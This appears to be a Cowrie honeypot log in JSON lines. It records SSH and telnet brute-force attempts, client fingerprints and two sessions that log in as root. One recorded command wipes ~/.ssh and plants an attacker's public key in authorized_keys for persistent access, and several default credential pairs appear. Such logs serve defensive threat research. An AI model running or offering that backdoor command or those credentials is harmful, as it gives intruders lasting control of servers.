{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T05:21:20.623362Z","src_ip":"212.227.235.229","session":"ea6175ed7e8d"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T05:21:20.623915Z","src_ip":"212.227.235.229","session":"ea6175ed7e8d"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T05:21:20.624613Z","src_ip":"212.227.235.229","session":"ea6175ed7e8d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-31T05:21:20.834554Z","src_ip":"212.227.235.229","session":"ea6175ed7e8d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:21:20.835409Z","src_ip":"212.227.235.229","session":"ea6175ed7e8d"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:21:20.836215Z","src_ip":"212.227.235.229","session":"ea6175ed7e8d"}
{"eventid":"cowrie.login.failed","username":"test","password":"123456789","message":"login attempt [test/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T05:21:20.944098Z","src_ip":"212.227.235.229","session":"13c02d5fcd03"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37146,"dst_ip":"1.2.3.4","dst_port":22,"session":"209624f2357a","protocol":"ssh","message":"New connection: 212.227.235.229:37146 (1.2.3.4:22) [session: 209624f2357a]","sensor":"my-vps","timestamp":"2025-08-31T05:21:22.067571Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:21:22.068438Z","src_ip":"212.227.235.229","session":"209624f2357a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:21:22.343915Z","src_ip":"212.227.235.229","session":"209624f2357a"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:21:22.733786Z","src_ip":"212.227.235.229","session":"13c02d5fcd03"}
{"eventid":"cowrie.login.failed","username":"lili","password":"lili","message":"login attempt [lili/lili] failed","sensor":"my-vps","timestamp":"2025-08-31T05:21:23.489222Z","src_ip":"212.227.235.229","session":"209624f2357a"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:21:24.767270Z","src_ip":"212.227.235.229","session":"209624f2357a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37214,"dst_ip":"1.2.3.4","dst_port":22,"session":"397fab664c0f","protocol":"ssh","message":"New connection: 212.227.235.229:37214 (1.2.3.4:22) [session: 397fab664c0f]","sensor":"my-vps","timestamp":"2025-08-31T05:21:31.823686Z"}
{"eventid":"cowrie.session.closed","duration":"140.5","message":"Connection lost after 140.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:21:33.188256Z","src_ip":"79.127.48.196","session":"c3a50e94f1fc"}
{"eventid":"cowrie.session.connect","src_ip":"121.181.51.95","src_port":41948,"dst_ip":"1.2.3.4","dst_port":23,"session":"b48b8cb9ee79","protocol":"telnet","message":"New connection: 121.181.51.95:41948 (1.2.3.4:23) [session: b48b8cb9ee79]","sensor":"my-vps","timestamp":"2025-08-31T05:21:33.599397Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33954,"dst_ip":"1.2.3.4","dst_port":22,"session":"279c45db3d6c","protocol":"ssh","message":"New connection: 212.227.125.160:33954 (1.2.3.4:22) [session: 279c45db3d6c]","sensor":"my-vps","timestamp":"2025-08-31T05:21:35.114003Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:21:35.572778Z","src_ip":"212.227.125.160","session":"279c45db3d6c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:21:35.573738Z","src_ip":"212.227.125.160","session":"279c45db3d6c"}
{"eventid":"cowrie.login.failed","username":"test","password":"123456789","message":"login attempt [test/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T05:21:37.514726Z","src_ip":"212.227.125.160","session":"279c45db3d6c"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:21:39.150471Z","src_ip":"212.227.125.160","session":"279c45db3d6c"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:21:40.003070Z","src_ip":"212.227.235.229","session":"397fab664c0f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:21:40.004315Z","src_ip":"212.227.235.229","session":"397fab664c0f"}
{"eventid":"cowrie.login.failed","username":"gitlab-runner","password":"gitlab-runner","message":"login attempt [gitlab-runner/gitlab-runner] failed","sensor":"my-vps","timestamp":"2025-08-31T05:21:40.723638Z","src_ip":"212.227.125.160","session":"6f2e93a55688"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35920,"dst_ip":"1.2.3.4","dst_port":22,"session":"439da302b0eb","protocol":"ssh","message":"New connection: 212.227.235.229:35920 (1.2.3.4:22) [session: 439da302b0eb]","sensor":"my-vps","timestamp":"2025-08-31T05:21:43.367055Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:21:43.367973Z","src_ip":"212.227.235.229","session":"439da302b0eb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:21:43.450906Z","src_ip":"212.227.235.229","session":"439da302b0eb"}
{"eventid":"cowrie.login.failed","username":"ttbot","password":"ttbot","message":"login attempt [ttbot/ttbot] failed","sensor":"my-vps","timestamp":"2025-08-31T05:21:43.824193Z","src_ip":"212.227.235.229","session":"439da302b0eb"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:21:44.909938Z","src_ip":"212.227.235.229","session":"439da302b0eb"}
{"eventid":"cowrie.session.closed","duration":"42.0","message":"Connection lost after 42.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:21:56.509589Z","src_ip":"212.227.125.160","session":"6f2e93a55688"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42154,"dst_ip":"1.2.3.4","dst_port":22,"session":"201c8d615d00","protocol":"ssh","message":"New connection: 212.227.125.160:42154 (1.2.3.4:22) [session: 201c8d615d00]","sensor":"my-vps","timestamp":"2025-08-31T05:21:57.979308Z"}
{"eventid":"cowrie.session.connect","src_ip":"137.184.169.231","src_port":44114,"dst_ip":"1.2.3.4","dst_port":23,"session":"d3e461e1f32a","protocol":"telnet","message":"New connection: 137.184.169.231:44114 (1.2.3.4:23) [session: d3e461e1f32a]","sensor":"my-vps","timestamp":"2025-08-31T05:22:06.163561Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-31T05:22:07.939497Z","src_ip":"137.184.169.231","session":"d3e461e1f32a"}
{"eventid":"cowrie.session.closed","duration":34.960875272750854,"message":"Connection lost after 34 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:22:08.560199Z","src_ip":"121.181.51.95","session":"b48b8cb9ee79"}
{"eventid":"cowrie.session.closed","duration":5.0914106369018555,"message":"Connection lost after 5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:22:11.254901Z","src_ip":"137.184.169.231","session":"d3e461e1f32a"}
{"eventid":"cowrie.session.connect","src_ip":"137.184.169.231","src_port":34678,"dst_ip":"1.2.3.4","dst_port":23,"session":"b36ed8745a27","protocol":"telnet","message":"New connection: 137.184.169.231:34678 (1.2.3.4:23) [session: b36ed8745a27]","sensor":"my-vps","timestamp":"2025-08-31T05:22:11.362773Z"}
{"eventid":"cowrie.session.closed","duration":1.1334171295166016,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:22:12.496125Z","src_ip":"137.184.169.231","session":"b36ed8745a27"}
{"eventid":"cowrie.session.connect","src_ip":"137.184.169.231","src_port":34692,"dst_ip":"1.2.3.4","dst_port":23,"session":"e5ee419d0d38","protocol":"telnet","message":"New connection: 137.184.169.231:34692 (1.2.3.4:23) [session: e5ee419d0d38]","sensor":"my-vps","timestamp":"2025-08-31T05:22:12.613407Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50770,"dst_ip":"1.2.3.4","dst_port":22,"session":"d88588509f98","protocol":"ssh","message":"New connection: 212.227.235.229:50770 (1.2.3.4:22) [session: d88588509f98]","sensor":"my-vps","timestamp":"2025-08-31T05:22:12.715040Z"}
{"eventid":"cowrie.login.success","username":"root","password":"icatch99","message":"login attempt [root/icatch99] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:22:12.996723Z","src_ip":"137.184.169.231","session":"e5ee419d0d38"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:22:13.015718Z","src_ip":"137.184.169.231","session":"e5ee419d0d38"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-31T05:22:13.217560Z","src_ip":"137.184.169.231","session":"e5ee419d0d38"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:22:13.907279Z","src_ip":"212.227.235.229","session":"d88588509f98"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:22:13.908383Z","src_ip":"212.227.235.229","session":"d88588509f98"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:22:14.424808Z","src_ip":"137.184.169.231","session":"e5ee419d0d38"}
{"eventid":"cowrie.session.closed","duration":1.8149821758270264,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:22:14.428320Z","src_ip":"137.184.169.231","session":"e5ee419d0d38"}
{"eventid":"cowrie.login.failed","username":"test","password":"password","message":"login attempt [test/password] failed","sensor":"my-vps","timestamp":"2025-08-31T05:22:18.749069Z","src_ip":"212.227.235.229","session":"d88588509f98"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:22:20.519624Z","src_ip":"212.227.235.229","session":"d88588509f98"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50918,"dst_ip":"1.2.3.4","dst_port":22,"session":"7222fb6c018e","protocol":"ssh","message":"New connection: 212.227.235.229:50918 (1.2.3.4:22) [session: 7222fb6c018e]","sensor":"my-vps","timestamp":"2025-08-31T05:22:25.125838Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:22:25.130123Z","src_ip":"212.227.235.229","session":"7222fb6c018e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:22:25.400664Z","src_ip":"212.227.235.229","session":"7222fb6c018e"}
{"eventid":"cowrie.login.success","username":"root","password":"1234rewq!","message":"login attempt [root/1234rewq!] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:22:26.486067Z","src_ip":"212.227.235.229","session":"7222fb6c018e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:22:27.050167Z","src_ip":"212.227.235.229","session":"7222fb6c018e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:22:27.051178Z","src_ip":"212.227.235.229","session":"7222fb6c018e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:22:27.052334Z","src_ip":"212.227.235.229","session":"7222fb6c018e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:22:27.323952Z","src_ip":"212.227.235.229","session":"7222fb6c018e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:22:27.924106Z","src_ip":"212.227.235.229","session":"7222fb6c018e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:22:27.925094Z","src_ip":"212.227.235.229","session":"7222fb6c018e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:22:28.205631Z","src_ip":"212.227.235.229","session":"7222fb6c018e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:22:28.206535Z","src_ip":"212.227.235.229","session":"7222fb6c018e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52320,"dst_ip":"1.2.3.4","dst_port":22,"session":"a4065225b9b4","protocol":"ssh","message":"New connection: 212.227.235.229:52320 (1.2.3.4:22) [session: a4065225b9b4]","sensor":"my-vps","timestamp":"2025-08-31T05:22:28.447637Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:22:28.455353Z","src_ip":"212.227.235.229","session":"a4065225b9b4"}
